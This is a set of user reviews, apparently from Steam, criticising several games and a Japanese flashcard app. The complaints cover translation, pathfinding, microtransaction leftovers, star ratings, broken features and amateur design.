Bakery is a cute management simulation with a cute if not a little unrefined art style that I really want to love, but there's several things that get in the way of me being able to recommend this game to other people. I don't want to seem like I'm trying to pick this game apart but I want to give my honest feedback on what I think could be improved, should the developer decide to continue developing on this game. In the state it's currently in I cannot recommend this game to English Speaking players. The English translation is very difficult, if impossible, to understand at times. That being said, from what I can piece together, the story is very engaging and I find myself wish I spoke the original language this game was written in so that I could actually understand it better. The translation also leads to some confusion as to what exactly recipes are supposed to be and even some confusion on what the employees are (I believe the Accountant could possibly be considered a Cashier in English for example) The translation isn't the only thing wrong with this game though, if it had been I could have possibly let it slide. There are massive problems with path finding, leaving you with very little choice in how your shop is actually put together. If you don't want your employees and customers stuck running in circles in a corner you have only one true configuration for the first shop. The mechanics could also use a good deal of fine tuning, such as the normal and slow speeds being literally so slow they're virtually unplayable, and the extreme speed too fast to keep up with inventory which will either sell or rot. Unless you play extremely close attention (I kept a tally for a while before I simply gave up in frustration) you cannot actually manage your inventory. My suggestion for this would be to implement a "Receipts" and "Waste" section in the report area. The Receipts showing the total amount of each pastry item sold and Waste showing what's expired.My final note is, I'm not sure how expenses are handled in other countries, but in the USA most employees are either paid either weekly, or every other week. Some are even paid daily. Waiting until the end of the month to hope you have somehow managed to find the mysterious favorite combination of breads to make the enormous employee payments takes an obnoxious amount of actual real life time even in Extreme Speed mode, just to find out you have to start over. Overall I want to love this game I really really do, the cute story and art style draw me in and I adore management sims in general. The mechanics really could be fun if refined. That feels like what this game needs the most, just a little bit of refinement. I really hope the developer continues to update this game and I can change this review to a Recommend in the future.
Middling-quality mobile game port that can't shake its past trappings:Text cues were copied directly from the mobile version, referencing "tapping", "diamonds", and "speed up" even though you're now on M+KB and diamonds and timers have been removed.Even though diamond rewards have been replaced with extra coins, various prices throughout the game were never scaled and are still set at high points to incentivize no longer available microtransactions.Screen panning and control mechanics are still built for multi-input touch displays, leaving overall control clunky.Overall writing quality is mediocre with multiple errors common to non-English writers writing in English.Extremely repetitive gameplay elements meant to incentivize skipping via microtransactions, such as merging duplicate gear items to increase strength, still exist.All in all, I can't even recommend this game on sale. This is unfortunate as there are few "create path"-style puzzle-RPG hybrids worth playing.
Pros Nice 2d artwork Voice actingCons Gamecube-era 3d graphics... in a game released in 2020 Weak, super basic story and characterization Gameplay is super vanilla, repetitive, and requires little thought Feels unfinished, due to the above (as well as the original asking price)VerdictWhile cute, it's very lackluster. It was also pretty dumb for this game to have voice acting (nice as it was), given how...1) The IP isn't that popular2) This game is a huge letdown, given the original asking priceUnless the voice actors were volunteers, it was a waste of money on the devs' part to hire them. I'd recommend getting this game on sale when it dips to around 5 USD.
I personally feel this application is more of a bank of words, rather than an effective study tool. There are websites that I use that helped me such as Real Kana and quizlet that is simply more polished to work with. If there are going to be more updates, these are things that should be considered to implement.1. Key inputs during quizzesI feel the lack of typing the answer kind of loses my motivation to answer more than 10 questions. I personally think it would be a more engaging experience if I am able to type these key inputs. It really gives off of a personal competitive vibe that brings the experience on a new level2. Customization for flashcards.Obviously if you are doing flashcards, it is almost essential to have a "custom" list depending on what you want to learn. Although there is a looping system, it doesn't really help since you don't choose what cards you want to study. The only method I found is by missing them on purpose and then practice the ones you missed.3. Provide audio for KanjiIt feels frustrating that there is a lack of consistency when it audio isn't supported for everything. When I was looking through the kanji section, I had a hard time how to "pronounce" the words since it has different ways to spell it. Let's take the word 本. It means book if it was pronounced as ほん aka hon. However there is another way to interpret the kanji, which is もと aka moto, and I wish there is a default audio file that tells me which is the more common pronunciation, which I learned from my Japanese Class was Hon.Overall, it just feels this was made as a college project, I made a way worse version of a flashcard app before and I can definitely say it takes a lot of manual work when it comes to inputting a lot of information and files into an app. However, it doesn't really excuse the lack of polish this product holds and I do hope there are more updates so I can change my review.
Dont buy this! Broken since more than a year, can't access the inventory, without which you can't solve some puzzles.
As a fan of the original game, I saw this when it was on sale and I thought for £1.74 it should be worth it. Even after reading the reviews, I thought I couldn't be as bad as people said it was. It's awful.The star rating system seems okay at first, until you design a really cool system (for example on the button+lever light level near the beginning, I had a pinball drop and be moved a bit with a magnet after it fell off, then punched upwards, all carefully designed so it would fall on the button: 1 star). The star enocurages you to come up with a boring method that uses different compontents, and as few pieces as possible. This does not push you towards an interesting method, but trial and error to try and find the only way of getting 3 stars. The gears are a complete mystery to me. You start with enough to get all the hints and all the levels. What's the point? If it's there for a score then it is a measure of how much time you had to repeatedly fail and try to guess what it wants you to use. Gameplay wise, I would disagree with the other reviews: I find the positioning of objects quite simple, however I do miss the sections as there was in the original game. The controls do seem okay, but it would be nice to be able to know what things do without placing them in, clicking a different button, then clicking on the item again. Surely a tool tip would be much more sensible.I have not tried the user made levels, nor the level editor, as I did not wish to waste any more of my time. If it is any good then it may be a redeeming feature, however I believe that the overall system of rating would be even worse on user levels.I would rate the game 1/10. The game is awful, there are no options for graphics, or sound (other than enable/disable), and the replayability appears to be nil. I have not played past the first 10 levels as I became overwhelmingly bored. Even for fans of the original game, or first time players, this game is not worth the bandwidth to download it. Do not get it even if it's free.Tl;dr: Do not download this game under any circumstances. Everything about it is awful.
Read the whole thing before passing judgement.So let me be clear, this isn't a good game. Not good in the sense that it fails to meet much of the the basic criteria most people set out for their game. The performance isn't great, which is alarming given the graphics are straight out of 2002. The assets (sounds, enemies, walls, obstacles, buildings, and skybox) are clearly not original and seem to be placed throughout the maps with gleeful abandon. Enemy AI is about as simple as it could possibly be. Gun handling is static and flat. Honestly it feels like a bad mod for Half Life one.As for the story/gameplay itself, well its a good thing the player moves like Usain Bolt on cocaine because the entire game (as best as I can discern) consists of moving across large labrynthe like maps finding keys (small, easy to miss) before backtracking to the starting area to unlock doors. The only story I got in my short playtime was Microsoft Sam's robotic giving me a sentence or two about an area I am entering or perhaps a cursory overview of my mission, oh and also that the RFF are bad. There was no story that I could make out. Had I not reread the store page description I would have had no idea who my character was, what he was doing, or why. Certainly I did not encounter much in the way of an emotional journey. Clearly as you can probably see I did not spend much time playing this game. I made it through all of the first level and much of the second level before I called it quits on the repetitive shooting at enemies from outside their vision range.Imagine you spent an afternoon in Garry's Mod placing down prebuilt objects and HL2 enemies semi randomly. That seems to be about what this game amounts to. HOWEVER, It seems clear to me that this game is not trying to be something that I am criticizing it for failing to be. I purchased it on sale for 89 Cents Canadian, and I got my money's worth in 30 minutes of amusement. Moreover It is clear to me that the person who made this game is perhaps early on in their career of designing games. To that person, if they are reading this review I have only words of encouragement to give. While lacking in many areas of design that a standard game would have, it has a nugget of originality and is clearly a milestone on the path to actually good creations. To the designer: Good job, keep making games,To the interested customer: Pass on this unless you are very passionate about half life one mods and/or reused source assets.
muito fraco, nao vale nada.
Horrible. All you have to do is click somewhere. Then click there again. Then click in that same spot a bunch more times untill you get to your "immersive" desktop. Then click on a folder, click on an icon, and then repeat.Its not hard, fun, or interesting.But then again I did learn an important lesson: How to get a refund on steam games!
Feels like a broken prototype of a game. Some of menu buttons won't work and collision detection seem to not detect collision often.
